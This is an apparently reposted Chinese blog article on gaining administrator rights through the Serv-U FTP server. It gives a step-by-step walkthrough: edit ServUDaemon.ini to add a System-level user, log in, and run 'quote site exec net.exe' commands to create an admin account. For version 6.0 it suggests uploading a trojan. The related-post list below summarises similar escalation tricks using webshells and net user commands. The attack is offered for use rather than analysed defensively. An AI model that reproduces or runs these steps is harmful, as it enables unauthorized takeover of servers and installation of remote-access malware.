Serv-U FTP Server远程/本地提升权限

最新推荐文章于 2023-07-12 08:48:42 发布
最新推荐文章于 2023-07-12 08:48:42 发布
阅读量121 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 操作系统
原文链接:http://www.cnblogs.com/CnKker/archive/2006/10/09/524128.html
本文介绍Serv-U FTP服务中的一个安全漏洞,攻击者可通过修改ServUDaemon.ini文件获得FTP管理员权限,并执行任意命令。文章详细描述了利用该漏洞的过程及限制条件。
        Serv-U FTP Serve在设置用户以后会把配置信息存储与ServUDaemon.ini文件中。包括用户的权限信息和可访问目录信息。本地受限用户或者是远程攻击者只要能够读写Serv-U FTP Serve的文件目录,就可以通过修改目录中的ServUDaemon.ini文件实现以Ftp进程在远程、本地系统上以FTP系统管理员权限来执行任意命令。并且不受系统版本的影响。(用户信息选择“存储与系统注册表中”不受此缺陷影响)

假设已经登陆到对方的计算机系统,并且取得了ServUDaemon.ini文件,而且可以进行编辑.

我们把ServUDaemon.ini down下来,并copy到本地Serv-U软件目录下,利用Serv-U软件添加用户

[USER=test|1]
Password=si4C45A74DD444F94C5829E498EE3C4882
HomeDir=c:\
TimeOut=600
Maintenance=System  ////权限类型
Access1=C:\|RWAMELCDP

添加一个test用户,密码testtest

然后保存到服务器Serv-U目录下,覆盖原有ServUDaemon.ini文件

现在我们可以登陆FTP,执行任意命令
ftp>open ip

  Connected to ip.

  220 Serv-U FTP Server v4.1.0.0 for WinSock ready...

  User (ip:(none)): id //输入构造的用户

  331 User name okay, please send complete E-mail address as password.

  Password:password //密码

  230 User logged in, proceed.

  ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。

  250 Directory changed to /WINNT

  ftp>cd system32 //进入system32目录

  250 Directory changed to /WINNT/system32

  ftp>quote site exec net.exe user Admin$ admin /add //利用系统的net.exe文件加用户。

  200 EXEC command successful (TID=33).

  ftp>quote site exec net.exe localhost administrators Admin$/add //提升为超级用户

  这样就在本地系统上加了一个为zihuan密码为:ziHUAN的超级用户。也可以直接用quote site exec net.exe localhost administrators user /add命令把当前用户提升到超级用户组中去。当然也可以在系统上执行任何命令。

经过测试,此方法对6.0版本的Serv-U没有什么作用,不能通过net.exe提权,我们可以上传一个木马,比如灰鸽子,通过运行灰鸽子来提权.

还有,需要重新启动计算机,可以用iisreset /reboot 来重新启动

转载于:https://www.cnblogs.com/CnKker/archive/2006/10/09/524128.html

第3课:serv-u服务器提权(serv-u目录无修改权限的情况)
06-24
第3课:serv-u服务器提权(serv-u目录无修改权限的情况)
Serv-U_FTP_Server_15.1.5_ftp服务端.zip
08-13
Serv-U FTP Server 15.1.5:FTP服务端详解】 FTP(File Transfer Protocol)文件传输协议是互联网上广泛使用的文件交换机制,而Serv-U FTP Server是一款专业的FTP服务器软件,尤其适用于企业级的文件管理和共享。...
serv-u提升权限又一思路
蓝法典的专栏
02-28 2724
今天晚上再渗透某站点的时候,碰到了点困难,所以到处找资料.凑巧看到http://eviloctal.bbnl.org/forum/read.php?tid=8157&fpage=1   这个文章.呵呵我本来以前也碰到这个情况.不过.还是自己解决了,不过所用的方法是跟intruder所用的方法不一样..我用的是嗅探.   但是我所入侵的主机的管理员的安全意识比较好.所以他把serv-u的本地监听的管
Serv-u 提权
weixin_44023460的博客
07-12 598
asp.net的webshell中,单击“Cmdshell”,在CmdPath中将cmd.exe修改为net或者net.exe,然后在“Argument”中输入“net localgroup administrators”,最后单击“Submit”查看管理员用户组,如图1所示,一共有4个管理员用户。打开远程终端登录窗口,在连接地址中输入“xxx.xxx.xxx.xxx:53389”如图7所示,输入刚才添加的用户名和密码,成功登录远程终端,说明Serv-u提权成功。图7 Serv-U提权成功。
Serv-U权限提升提升--记一次虚拟主机入侵
蓝克BLOG
03-15 734
 Serv-U权限提升提升--记一次虚拟主机入侵 
好用的 FTP 服务器 Serv-U File Server 15.2.0 中文多语免费版.zip
06-02
Serv-U File Server 是最好用的 FTP 服务器之一了。Serv-U™ – Windows平台的FTP服务器软件Serv-U 是目前众多的 FTP 服务器软件之一。通过使用Serv-U,用户能够将任何一台PC 设置成一个FTP 服务器,这样,用户或...
Serv-U FTP Server 6.4.zip
04-17
具体细节需参考`Serv-U FTP Server 6.4.txt`文档,可能包括稳定性提升、新的安全策略或用户体验改进。 6. **使用提示**: - 定期更新Serv-U到最新版本,以获取最新的安全补丁和功能。 - 确保对用户密码实施强密码...
Serv-U FTP Server 6.0绿色版、汉化版、破解版
10-04
FTP Serv-U , 一个最多人使用的 FTP 架站软件,想要架一个 FTP 站,使用它非常合适及方便,FTP Serv-U 让您在 Windows 底下,轻松的架起一个强大的 FTP 服务器,它提供的保全设定包括密码、使用者权限、使用者 IP ...
serv-u-win10(15.2).rar
08-19
Serv-U以其稳定、安全和易用性著称,提供了一整套完善的FTP服务解决方案,包括SSL/TLS加密、虚拟磁盘映射、多域管理、用户权限控制等功能。 **Serv-U 15.2 版本特点** 1. **增强的安全性**:Serv-U 15.2版本加强了...
php serv-u提权,Serv-U本地权限提升ASP版实现
weixin_35715366的博客
03-25 182
Serv-U本地权限提升ASP版实现2021-01-23 15:53:1510网上流传可以利用MSWinsock控件实现,这是不好滴。因为这是个第三方组件,呵呵,几率相当小,既然要杀人灭口,嘿嘿,肯定要采用一套通杀的方法才是。Serv-U服务器管理那里使用了FTP协议,所以我们应该研究一下FTP协议先。正常的FTP协议的认证过程:220Serv-UFTPServerv5.2forWinSockr...
Serv-U本地权限提升漏洞
陈巍@人生态度
08-10 1725
受影响系统: RhinoSoft Serv-U 5.1.0.0RhinoSoft Serv-U 5.0.0.9RhinoSoft Serv-U 5.0.0.4RhinoSoft Serv-U 5.0RhinoSoft Serv-U 4.1.0.3RhinoSoft Serv-U 4.1.0.11RhinoSoft Serv-U 4.0.0.4RhinoSoft Serv-U 4.0.0.0
Serv-U本地权限提升ASP实现
热门推荐
lake2的专栏
08-01 1万+
Author:lake2 ( http://lake2.0x54.org ) 最近的生活真无聊,寒冰掌老大见我无所事事,就说如果我能把Serv-U本地提权的ASP程序做出来就给介绍个MM,所以呢,就有了这篇文章^_^Serv-U本地提权的问题很古老了,不清楚的朋友谷歌一下先,我就不罗嗦啦。呵呵,最主要的是相继出现了php、perl、aspx版本的提权脚本,一时间刀光剑影满天飞,惟独缺了
Serv-U本地权限提升ASP实现(转)
黑鹰
03-15 854
Serv-U本地权限提升ASP实现最近的生活真无聊,寒冰掌老大见我无所事事,就说如果我能把Serv-U本地提权的ASP程序做出来就给介绍个MM,所以呢,就有了这篇文章^_^Serv-U本地提权的问题很古老了,不清楚的朋友谷歌一下先,我就不罗嗦啦。呵呵,最主要的是相继出现了php、perl、aspx版本的提权脚本,一时间刀光剑影满天飞,惟独缺了ASP版的。主要是由于郁闷的ASP不能像其他脚本那样访
软件自动升级ftp服务器,国人自己的专业FTP服务器软件(上)
weixin_29343187的博客
07-30 409
  目前FTP服务器软件都为国外作品,国内成熟的FTP服务器软件很少,有一些,但从功能上看来远不能和那些流行的服务器软件媲美。不过,笔者近日发现了一款国人自行开发的FTP服务器软件Crob FTP Server。从功能设置上可以看出,它沿用了像Server-U等主流FTP服务器软件的基本设置;并加入了不少人性化的功能;同时支持多服务器。(即在软件中可以在任意的有效端口上建立任意多的FTP服务器并可...
利用Serv-u提权的简单思路
weixin_45945976的博客
10-18 2322
利用Serv-u提权 Serv-u提权提权分两种: 有修改权限(可写权限) 无权限修改(不可写权限) 安装目录找到serv u的ServUDaemon.ini这个文件(该文件时储存密码的),然后将密码丢到shell里面去,然后进行serv-u提权,一般管理员并不修改serv-u的密码 1.先判断服务器中是否安装了serv-u serv-u的默认端口是43958 可以用nmap 扫描确认 判断是否有写入权限: 一般安装目录 c:\Program Files\Serv-u\SerUDaemon.ini 进入到
不要东奔西跑 实现Serv-U远程管理
weixin_33751566的博客
03-19 234
如今,在主机上使用既专业又稳定的Serv-U已经成为站长们的首选,但在管理Serv-U上,不少站长还是以终端登陆远程服务器然后再进行设置,其实我们完全不必这样,只要一个简单设置,你就可以在本地控制远程Serv-U服务了。   一、建立管理员账号  登陆远程服务器,打开Serv-U管理界面,在左侧项目列表中找到“用户”项,可以看到当前域中的所有用户信息,在右侧“用户”列表框的...
Serv-U提权之CMD下提权命令
ismycxp的专栏
06-14 2596
quote site exec net user username password /add                                  ↑创建一个用户名为 username  密码为 password     的系统帐号quote site exec net localgroup administrators username /add ↑将username
serv-u升级异常记录
qq_24192621的博客
03-02 425
背景:serv-u从15.1升级至15.3 异常1:覆盖安装升级卡在最后安装为服务阶段 解决:虚拟化服务器CPU资源不足,升级CPU资源后正常安装 异常2:升级完成后原FTP文件无法删除/覆盖 解决:需授予原文件network service用户完全控制权限,新serv-u方可对原文件进行删除/覆盖等操作
Serv-U FTP Server 中文使用教程详解
Serv-U FTP Server是一款广泛应用于搭建FTP服务器的软件,它可以帮助用户快速地在本地或网络环境中创建稳定的文件传输服务。对于想了解如何搭建和管理FTP服务器的IT专业人员或普通用户而言,掌握Serv-U FTP Server的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值